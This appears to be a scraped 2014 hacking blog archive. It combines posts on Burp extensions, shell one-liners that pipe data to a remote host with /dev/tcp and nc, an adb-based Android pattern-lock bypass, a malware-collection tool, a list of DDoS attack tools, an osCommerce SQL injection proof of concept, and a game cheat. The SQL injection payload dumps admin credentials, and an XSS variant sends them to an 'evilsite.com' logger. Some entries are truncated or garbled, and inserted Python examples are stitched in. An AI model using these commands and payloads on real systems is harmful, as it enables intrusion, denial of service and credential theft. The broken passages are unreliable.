Feb 13, 2014

Tools: Burp CO2 - collection of Burp extensions

This is for those of you who do web pen testing with Portswigger's Burp proxy tool! Over the past couple of months I have been using my Java skills and "free time" (lol) to build a collection of Burp extensions that have been dubbed "Co2".
Included in this version are a few useful modules.  The first is called SQLMapper, a sqlmap helper.  Simply right-click on any request in Burp and you will see a new menu option to send the request to SQLMapper.  The following screen will appear pre-populated with the URL, POST data (if applicable) and Cookies (if applicable) from the request.  You can then set any other options you need and then copy/paste the SQLMap Command to sqlmap on your command line.

Source: http://blog.secureideas.com/2014/02/announcing-burp-co2.html

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Sending stdout to another server without programming

cat test >/dev/tcp/$host/$port # if tcp
cat test >/dev/udp/$host/$port # if udp
cat test | nc $host $port      # if tcp
cat test | nc -u $host $port   # if udp 
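As an added example (not code from the original post), the receiving end that the one-liners above need, run on loopback: it shows that the TCP form delivers a byte stream ended by the sender closing, while the UDP form delivers one datagram per write with no end-of-stream marker. The function names are my own; the sender function stands in for the bash redirection.

```python
# Added example (not from the original post): the receiving end that the one-liners
# above need, run on loopback. TCP delivers a byte stream that ends when the sender
# closes; UDP delivers one datagram per write and nothing marks the end.
# Caveat: /dev/tcp and /dev/udp are bash features, not real device files, so the
# redirection form fails under dash/sh; the nc form works in any shell.
import socket
import threading

def open_listener(proto: str, host: str = "127.0.0.1", port: int = 0) -> socket.socket:
    """Bind a TCP or UDP listener; port 0 lets the OS choose a free port."""
    kind = socket.SOCK_STREAM if proto == "tcp" else socket.SOCK_DGRAM
    sock = socket.socket(socket.AF_INET, kind)
    sock.settimeout(5)
    sock.bind((host, port))
    if proto == "tcp":
        sock.listen(1)
    return sock

def receive_once(listener: socket.socket, proto: str) -> bytes:
    """Wait for a single sender and return everything it delivered."""
    if proto == "udp":
        data, _peer = listener.recvfrom(65535)
        return data                        # one datagram == one write by the sender
    conn, _peer = listener.accept()
    with conn:
        chunks = []
        while chunk := conn.recv(65536):   # read until the sender closes the socket
            chunks.append(chunk)
    return b"".join(chunks)

def send_like_redirect(proto: str, host: str, port: int, payload: bytes) -> None:
    """Stand-in for `cat test >/dev/tcp/$host/$port` (or the udp variant)."""
    kind = socket.SOCK_STREAM if proto == "tcp" else socket.SOCK_DGRAM
    with socket.socket(socket.AF_INET, kind) as s:
        s.connect((host, port))
        s.sendall(payload)                 # closing the socket is the sender's EOF

def loopback_demo(proto: str, payload: bytes) -> bytes:
    """Run listener and sender on 127.0.0.1 and return what the listener received."""
    listener = open_listener(proto)
    port = listener.getsockname()[1]
    seen = []
    worker = threading.Thread(target=lambda: seen.append(receive_once(listener, proto)))
    worker.start()
    send_like_redirect(proto, "127.0.0.1", port, payload)
    worker.join()
    listener.close()
    return seen[0]
```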

Feb 12, 2014

Howto: How to bypass the Android pattern lock

1. Connect your phone to your PC using a USB cable.

2. Installing ADB over the terminal

3. Boot into any Linux distro you have.

4. Install ADB:
apt-get install android-tools-adb

5. Disabling pattern unlock over the terminal:
adb devices
adb shell
cd data/system
rm *.key

6. Reboot the phone; the unlock pattern should be gone. Just try some random gesture and it will unlock.

Feb 10, 2014

Tools: Maltrieve - A tool to retrieve malware directly from the source for security researchers.

Maltrieve originated as a fork of mwcrawler. It retrieves malware directly from the sources as listed at a number of sites, including:
•    Malc0de
•    Malware Black List
•    Malware Domain List
•    Malware Patrol
•    Sacour.cn
•    VX Vault
•    URLquery
•    CleanMX
These lists will be implemented if/when they return to activity.
•    NovCon Minotaur
Other improvements include:
•    Proxy support
•    Multithreading for improved performance
•    Logging of source URLs
•    Multiple user agent support
•    Better error handling
•    VxCage and Cuckoo Sandbox support

Source: https://github.com/technoskald/maltrieve 

DoS List Tool

A denial of service (DoS) attack is a type of attack on a network that is designed to bring the network to its knees by flooding it with useless traffic. Many DoS attacks, such as the Ping of Death and Teardrop attacks, exploit limitations in the TCP/IP protocols.

A Teardrop attack is a type of attack in which fragmented packets are forged to overlap each other when the receiving host tries to reassemble them.

Ping of death is a type of DoS attack in which the attacker sends a ping request that is larger than 65,536 bytes, which is the maximum size that IP allows. While a ping larger than 65,536 bytes is too large to fit in one packet that can be transmitted, TCP/IP allows a packet to be fragmented, essentially splitting the packet into smaller segments that are eventually reassembled. Attacks took advantage of this flaw by sending fragments that, when reassembled, would total more than the allowed number of bytes and would effectively cause a buffer overflow in the operating system at the receiving end, crashing the system. Ping of death attacks are rare today, as most operating systems have been fixed to prevent this type of attack from occurring.
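As an added example (not code from the original post), the fragment checks a reassembling host needs in order to refuse both forms described above: an oversize reassembly (Ping of Death) and overlapping fragments (Teardrop). The Fragment and Reassembler names are my own; offsets are in 8-byte units as carried in the IPv4 header.

```python
# Added example (not part of the original post): fragment-reassembly checks of the
# kind that closed the Ping of Death and Teardrop holes described above.
from dataclasses import dataclass, field
from typing import List, Optional, Tuple

IP_MAX_DATAGRAM = 65535          # largest IPv4 total length the 16-bit field allows
IP_MIN_HEADER = 20               # so a reassembled payload may never exceed 65515 bytes
MAX_PAYLOAD = IP_MAX_DATAGRAM - IP_MIN_HEADER

@dataclass
class Fragment:
    offset: int                  # "fragment offset" header field, in units of 8 bytes
    more: bool                   # MF flag: True for every fragment except the last
    payload: bytes

@dataclass
class Reassembler:
    ranges: List[Tuple[int, int]] = field(default_factory=list)  # accepted byte ranges
    total: Optional[int] = None  # known only once the last fragment has arrived

    def add(self, frag: Fragment) -> str:
        """Return 'ok' or the reason the fragment was refused."""
        start = frag.offset * 8
        end = start + len(frag.payload)
        if end > MAX_PAYLOAD:
            return "oversize"    # Ping of Death: reassembly would exceed 65535 bytes
        if frag.more and len(frag.payload) % 8:
            return "bad-length"  # non-final fragments must be 8-byte aligned
        for s, e in self.ranges:
            if start < e and s < end:
                return "overlap" # Teardrop: forged fragment overlaps one already held
        if not frag.more:
            if self.total is not None:
                return "duplicate-last"
            self.total = end
        elif self.total is not None and end > self.total:
            return "beyond-end"  # data past the end announced by the last fragment
        self.ranges.append((start, end))
        return "ok"

    def complete(self) -> bool:
        """True once the accepted ranges tile [0, total) with no gaps."""
        if self.total is None:
            return False
        pos = 0
        for s, e in sorted(self.ranges):
            if s != pos:
                return False
            pos = e
        return pos == self.total
```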

DDOS Attack: A distributed denial of service attack (DDoS) occurs when multiple systems flood the bandwidth or resources of a targeted system, usually one or more web servers. This is the result of multiple compromised systems (for example a botnet) flooding the targeted system(s) with traffic. When a server is overloaded with connections, new connections can no longer be accepted.

Peer to Peer Attack: Attackers have found a way to exploit a number of bugs in peer-to-peer servers to initiate DDoS attacks. Peer-to-peer attacks are different from regular botnet-based attacks. With peer-to-peer there is no botnet and the attacker does not have to communicate with the clients it subverts. Instead, the attacker acts as a "puppet master," instructing clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim's website instead. As a result, several thousand computers may aggressively try to connect to a target website. While peer-to-peer attacks are easy to identify with signatures, the large number of IP addresses that need to be blocked (often over 250,000 during the course of a large-scale attack) means that this type of attack can overwhelm mitigation defenses.

For all known DOS attacks, there are software fixes that system administrators can install to limit the damage caused by the attacks.

Top 10 DoS Attack Tools:

1. LOIC (Low Orbit Ion Canon)
This tool was used by the popular hacker group Anonymous. This tool is really easy to use, even for a beginner. It performs a DoS attack by sending UDP, TCP, or HTTP requests to the victim server. You only need to know the URL or IP address of the server and the tool will do the rest.

2. HOIC (High Orbit Ion Canon)
High Orbit Ion Canon (HOIC) is an Anonymous DDoS tool. HOIC is a Windows executable file.

High-speed multi-threaded HTTP flood:

- Simultaneously flood up to 256 websites at once
- Built-in scripting system to allow the deployment of 'boosters', scripts designed to thwart DDoS countermeasures and increase DoS output
- Easy to use interface
- Can be ported over to Linux/Mac with a few bug fixes (I do not have either systems so I do
- Ability to select the number of threads in an ongoing attack
- Ability to throttle attacks individually with three settings: LOW, MEDIUM, and HIGH

3. XOIC
XOIC is another nice DoS attacking tool. It performs a DoS attack on any server with an IP address, a user-selected port, and a user-selected protocol.

XOIC has 3 modes:

- Test mode
- Normal DoS attack mode (no request counter and no TCP/HTTP/UDP/ICMP message, for performance)
- DoS attack with a TCP/HTTP/UDP/ICMP message

4. Tor's Hammer
Tor's Hammer is a slow POST DoS testing tool written in Python. It can also be run through the Tor network to be anonymized. If you are going to run it with Tor it assumes you are running Tor on
Kills most unprotected web servers running Apache and IIS via a single instance. Kills Apache 1.X and older IIS with ~128 threads, newer IIS and Apache 2.X with ~256 threads.

5. Anonymous-DoS
Anonymous-DoS is an HTTP flood program written in HTA and JavaScript, designed to be lightweight, portable, possible to be uploaded to websites whilst still having a client version, and made for Anonymous DDoS attacks.

How does it work?
It will flood a chosen web server with HTTP connections; with enough of them it will crash the server, resulting in a denial of service.

6. It is a tool for committing distributed denial of service attacks using execution on other sites.

7. PyLoris
PyLoris is a scriptable tool for testing a server's vulnerability to connection exhaustion denial of service (DoS) attacks. PyLoris can utilize SOCKS proxies and SSL connections, and can target protocols such as HTTP, FTP, SMTP, IMAP, and Telnet.

8. Dereil
Dereil is a professional DDoS tool with modern attack patterns for the TCP, UDP and HTTP protocols. In computing, a denial-of-service attack (DoS attack) or distributed denial-of-service attack (DDoS attack) is an attempt to make a machine or network resource unavailable to its intended users.

9. Moihack Port-Flooder
This is a simple port flooder written in Python 3.2. Use this tool to quickly stress test your network devices and measure your router's or server's load. Features are available in the features section below. Moihack DoS Attack Tool was the name of the 1st version of the program. Moihack Port-Flooder is the reloaded version of the program with a major code rewrite and changes.

10. DDOSIM
DDOSIM simulates several zombie hosts (having random IP addresses) which create full TCP connections to the target server. After completing the connection, DDOSIM starts the conversation with the listening application (e.g. HTTP server).

Source: http://blog.hackersonlineclub.com/2013/11/dos-attack-types-and-tools.html

osCommerce v2.x SQL Injection Vulnerability

# Title: osCommerce v2.x SQL Injection Vulnerability
# Dork: Powered by osCommerce
# Author: Ahmed Aboul-Ela
# Contact: ahmed.aboul3la[at]gmail[dot]com - http://twitter.com/_secgeek
# Vendor : http://www.oscommerce.com
# Version: v2.3.3.4 (current latest release) and prior versions should be affected too
# References: http://www.secgeek.net/oscommerce-v2x-sql-injection-vulnerability

- Vulnerable Code snippet in "catalog/admin/geo_zones.php":

LINE 138: $rows = 0;
LINE 139: $zones_query_raw = "select a.association_id, a.zone_country_id, c.countries_name, a.zone_id, a.geo_zone_id, a.last_modified, a.date_added, z.zone_name from " . TABLE_ZONES_TO_GEO_ZONES . " a left join " . TABLE_COUNTRIES . " c on a.zone_country_id = c.countries_id left join " . TABLE_ZONES . " z on a.zone_id = z.zone_id where a.geo_zone_id = " . $HTTP_GET_VARS['zID'] . " order by association_id";
LINE 140: $zones_split = new splitPageResults($HTTP_GET_VARS['spage'], MAX_DISPLAY_SEARCH_RESULTS, $zones_query_raw,
LINE 141: $zones_query = tep_db_query($zones_query_raw);

As we can see at line 139, the GET zID parameter is directly concatenated into the SQL query
without any type of sanitization, which leads directly to an SQL injection vulnerability.

- Proof of Concept ( dump the admin username and password ):

http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID=1 group by 1 union select
1,2,3,4,5,6,7,concat(user_name,0x3a,user_password) from administrators --

- Exploitation & Attack Scenario:

An authenticated admin account is required to successfully exploit the vulnerability,
but it can be combined with other attack vectors like XSS / CSRF to achieve a more dangerous remote attack.

Example to steal the administrator username & password and send it to php logger at
"http://evilsite.com/logger.php?log=[ADMIN USER:HASH]"

We can use a hybrid attack technique (SQL Injection + XSS):

http://site.com/oscommerce/catalog/admin/geo_zones.php?action=list&zID= 1 group by 1 union select
2237465737422292e68746d6c28293c2f7363726970743e) from administrators --

- Mitigation:

The vendor has released a quick fix for the vulnerability. It is strongly recommended to apply the patch now.
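As an added example (not osCommerce code and not the vendor's patch), the concatenation from line 139 reduced to a Python/sqlite3 stand-in beside a hardened version that enforces the integer type of zID and binds it as a parameter. The table and its rows are constructed sample data.

```python
# Added example (not osCommerce code or the vendor patch): the zID concatenation from
# geo_zones.php line 139 reduced to a sqlite3 stand-in, beside a hardened version.
import sqlite3

def build_db() -> sqlite3.Connection:
    """Constructed sample data: three zone associations across two geo zones."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table zones_to_geo_zones (
            association_id integer, geo_zone_id integer, zone_country_id integer);
        insert into zones_to_geo_zones values (1, 1, 223), (2, 1, 38), (3, 2, 223);
    """)
    return db

def zones_vulnerable(db: sqlite3.Connection, zid: str) -> list:
    # Mirrors the original: the raw GET value is spliced straight into the SQL text,
    # so anything following the digits becomes part of the WHERE clause.
    sql = ("select association_id, zone_country_id from zones_to_geo_zones "
           "where geo_zone_id = " + zid + " order by association_id")
    return db.execute(sql).fetchall()

def zones_fixed(db: sqlite3.Connection, zid: str) -> list:
    # Hardened: zID is an integer key, so enforce that type before the query
    # is built and pass the value as a bound parameter, never as SQL text.
    if not zid.isdigit():
        raise ValueError("zID must be a non-negative integer")
    sql = ("select association_id, zone_country_id from zones_to_geo_zones "
           "where geo_zone_id = ? order by association_id")
    return db.execute(sql, (int(zid),)).fetchall()
```

With the vulnerable form, a value such as "1 or 1=1" returns rows from every geo zone; the hardened form rejects it before any SQL is built.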


Source: http://packetstormsecurity.com/files/125107/osCommerce-2.x-SQL-Injection.html

Feb 9, 2014

Howto: Cheat Flappy Bird on Android

1. Install Flappy Bird

2. Play it once.

3. Root your Android

4. Install ES File Explorer

5. Close and end your current Flappy Bird

6. Open ES File Explorer

7. Go to the "Tool" tab -> turn on "Root Explorer"

8. Go to the folder /data/data/com.dotgears.flappy and open it.

9. Open the "shared_prefs" folder

10. Open "FlappyBird.xml" with ES Note Editor (or another editor you want).

11. Set the <int name="score" value="score you want" /> entry, for example <int name="score" value="999" />

12. Save it.

13. Now close ES File Explorer and open your Flappy Bird

